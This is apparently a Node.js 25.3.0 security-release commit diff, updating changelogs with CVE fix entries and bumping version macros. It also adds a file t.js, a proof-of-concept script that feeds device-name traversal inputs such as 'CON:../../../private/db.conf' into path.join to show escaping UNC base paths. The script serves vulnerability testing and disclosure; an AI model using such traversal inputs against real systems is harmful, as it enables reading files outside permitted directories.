2026-01-13, Version 25.3.0 (Current)

RafaelGSS · RafaelGSS · commit 00d6cd83927d · 2026-01-09T18:35:18.000-03:00
This is a security release. Notable changes: lib: * (CVE-2025-59465) add TLSSocket default error handler (RafaelGSS) nodejs-private/node-private#750 permission: * (CVE-2026-21636) add network check on pipe_wrap connect (RafaelGSS) nodejs-private/node-private#784 * (CVE-2025-55130) require full read and write to symlink APIs (RafaelGSS) nodejs-private/node-private#760 * (CVE-2025-55132) disable futimes when permission model is enabled (RafaelGSS) nodejs-private/node-private#748 src: * (CVE-2025-59466) rethrow stack overflow exceptions in async_hooks (Matteo Collina) nodejs-private/node-private#773 src,lib: * (CVE-2025-55131) refactor unsafe buffer creation to remove zero-fill toggle (Сковорода Никита Андреевич) nodejs-private/node-private#759 tls: * (CVE-2026-21637) route callback exceptions through error handlers (Matteo Collina) nodejs-private/node-private#790 PR-URL: nodejs-private/node-private#793
diff --git a/CHANGELOG.md b/CHANGELOG.md
@@ -41,7 +41,8 @@ release.
 </tr>
 <tr>
   <td valign="top">
-<b><a href="doc/changelogs/CHANGELOG_V25.md#25.2.1">25.2.1</a></b><br/>
+<b><a href="doc/changelogs/CHANGELOG_V25.md#25.3.0">25.3.0</a></b><br/>
+<a href="doc/changelogs/CHANGELOG_V25.md#25.2.1">25.2.1</a><br/>
 <a href="doc/changelogs/CHANGELOG_V25.md#25.2.0">25.2.0</a><br/>
 <a href="doc/changelogs/CHANGELOG_V25.md#25.1.0">25.1.0</a><br/>
 <a href="doc/changelogs/CHANGELOG_V25.md#25.0.0">25.0.0</a><br/>
diff --git a/doc/changelogs/CHANGELOG_V25.md b/doc/changelogs/CHANGELOG_V25.md
@@ -8,6 +8,7 @@
 </tr>
 <tr>
 <td>
+<a href="#25.3.0">25.3.0</a><br/>
 <a href="#25.2.1">25.2.1</a><br/>
 <a href="#25.2.0">25.2.0</a><br/>
 <a href="#25.1.0">25.1.0</a><br/>
@@ -43,6 +44,40 @@
   * [io.js](CHANGELOG_IOJS.md)
   * [Archive](CHANGELOG_ARCHIVE.md)
 
+<a id="25.3.0"></a>
+
+## 2026-01-13, Version 25.3.0 (Current), @RafaelGSS
+
+This is a security release.
+
+### Notable Changes
+
+lib:
+
+* (CVE-2025-59465) add TLSSocket default error handler (RafaelGSS) <https://github.com/nodejs-private/node-private/pull/750>
+  permission:
+* (CVE-2026-21636) add network check on pipe\_wrap connect (RafaelGSS) <https://github.com/nodejs-private/node-private/pull/784>
+* (CVE-2025-55130) require full read and write to symlink APIs (RafaelGSS) <https://github.com/nodejs-private/node-private/pull/760>
+* (CVE-2025-55132) disable futimes when permission model is enabled (RafaelGSS) <https://github.com/nodejs-private/node-private/pull/748>
+  src:
+* (CVE-2025-59466) rethrow stack overflow exceptions in async\_hooks (Matteo Collina) <https://github.com/nodejs-private/node-private/pull/773>
+  src,lib:
+* (CVE-2025-55131) refactor unsafe buffer creation to remove zero-fill toggle (Сковорода Никита Андреевич) <https://github.com/nodejs-private/node-private/pull/759>
+  tls:
+* (CVE-2026-21637) route callback exceptions through error handlers (Matteo Collina) <https://github.com/nodejs-private/node-private/pull/790>
+
+### Commits
+
+* \[[`a6a74b89a7`](https://github.com/nodejs/node/commit/a6a74b89a7)] - **deps**: update c-ares to v1.34.6 (Node.js GitHub Bot) [#60997](https://github.com/nodejs/node/pull/60997)
+* \[[`5100614e26`](https://github.com/nodejs/node/commit/5100614e26)] - **deps**: update undici to 7.18.2 (Node.js GitHub Bot) [#61283](https://github.com/nodejs/node/pull/61283)
+* \[[`f0a8916887`](https://github.com/nodejs/node/commit/f0a8916887)] - **(CVE-2025-59465)** **lib**: add TLSSocket default error handler (RafaelGSS) [nodejs-private/node-private#750](https://github.com/nodejs-private/node-private/pull/750)
+* \[[`b4b887c5f7`](https://github.com/nodejs/node/commit/b4b887c5f7)] - **(CVE-2025-55132)** **lib**: disable futimes when permission model is enabled (RafaelGSS) [nodejs-private/node-private#748](https://github.com/nodejs-private/node-private/pull/748)
+* \[[`26be208039`](https://github.com/nodejs/node/commit/26be208039)] - **(CVE-2025-55130)** **lib,permission**: require full read and write to symlink APIs (RafaelGSS) [nodejs-private/node-private#760](https://github.com/nodejs-private/node-private/pull/760)
+* \[[`bdf5873d44`](https://github.com/nodejs/node/commit/bdf5873d44)] - **(CVE-2026-21636)** **permission**: add network check on pipe\_wrap connect (RafaelGSS) [nodejs-private/node-private#784](https://github.com/nodejs-private/node-private/pull/784)
+* \[[`0578e3e921`](https://github.com/nodejs/node/commit/0578e3e921)] - **(CVE-2025-59466)** **src**: rethrow stack overflow exceptions in async\_hooks (Matteo Collina) [nodejs-private/node-private#773](https://github.com/nodejs-private/node-private/pull/773)
+* \[[`4d6b55a6d1`](https://github.com/nodejs/node/commit/4d6b55a6d1)] - **(CVE-2025-55131)** **src,lib**: refactor unsafe buffer creation to remove zero-fill toggle (Сковорода Никита Андреевич) [nodejs-private/node-private#759](https://github.com/nodejs-private/node-private/pull/759)
+* \[[`c357a39e14`](https://github.com/nodejs/node/commit/c357a39e14)] - **(CVE-2026-21637)** **tls**: route callback exceptions through error handlers (Matteo Collina) [nodejs-private/node-private#790](https://github.com/nodejs-private/node-private/pull/790)
+
 <a id="25.2.1"></a>
 
 ## 2025-11-17, Version 25.2.1 (Current), @aduh95
diff --git a/src/node_version.h b/src/node_version.h
@@ -23,13 +23,13 @@
 #define SRC_NODE_VERSION_H_
 
 #define NODE_MAJOR_VERSION 25
-#define NODE_MINOR_VERSION 2
-#define NODE_PATCH_VERSION 2
+#define NODE_MINOR_VERSION 3
+#define NODE_PATCH_VERSION 0
 
 #define NODE_VERSION_IS_LTS 0
 #define NODE_VERSION_LTS_CODENAME ""
 
-#define NODE_VERSION_IS_RELEASE 0
+#define NODE_VERSION_IS_RELEASE 1
 
 #ifndef NODE_STRINGIFY
 #define NODE_STRINGIFY(n) NODE_STRINGIFY_HELPER(n)
diff --git a/t.js b/t.js
@@ -0,0 +1,39 @@
+const path = require("path")
+
+console.log("Node.js UNC Path Device Name Bypass PoC");
+console.log("Version:", process.version);
+console.log("Date:", new Date().toISOString());
+console.log("");
+
+console.log("[1] CVE-2025-27210 Fixed for regular paths:");
+console.log("  path.normalize(\"CON:../../secret.txt\")");
+console.log("  Result:", path.normalize("CON:../../secret.txt"));
+console.log("  SAFE - Device name prefixed");
+console.log("");
+
+console.log("[2] UNC paths with path.join() - STILL VULNERABLE:");
+
+function testExploit(testName, base, input, expectedSafe) {
+  const result = path.join(base, input);
+  const baseDepth = base.split("\\\\").length;
+  const resultDepth = result.split("\\\\").length;
+  const escaped = result.indexOf(base.split("\\\\").pop()) === -1;
+
+  console.log(`\n[${testName}]`);
+  console.log("  Base Path:", base);
+  console.log("  Malicious Input:", input);
+  console.log("  Result Path:", result);
+  console.log("  Expected Safe:", expectedSafe);
+  console.log("  Actual Result:", result);
+  console.log("  BYPASSED:", escaped || !result.startsWith(base.substring(0,10)) ? "YES" : "NO");
+}
+
+testExploit("Test 1", "\\\\fileserver\\\\public\\\\uploads", "CON:../../../private/db.conf", "\\\\fileserver\\\\public\\\\uploads\\\\.\\\\CON:..\\\\..\\\\..\\\\private\\\\db.conf");
+testExploit("Test 2", "\\\\webapp\\\\data", "PRN:../../C$/admin", "\\\\webapp\\\\data\\\\.\\\\PRN:..\\\\..\\\\C$\\\\admin");
+testExploit("Test 3", "\\\\nas\\\\share", "AUX:../secret", "\\\\nas\\\\share\\\\.\\\\AUX:..\\\\secret");
+
+console.log("\n[!] All device names allow path traversal in UNC paths!");
+console.log("[!] This bypasses CVE-2025-27210 protection!");
+
+console.log('Path.join')
+console.log(path.join('/home/rafaelgss/', '../tmp'))
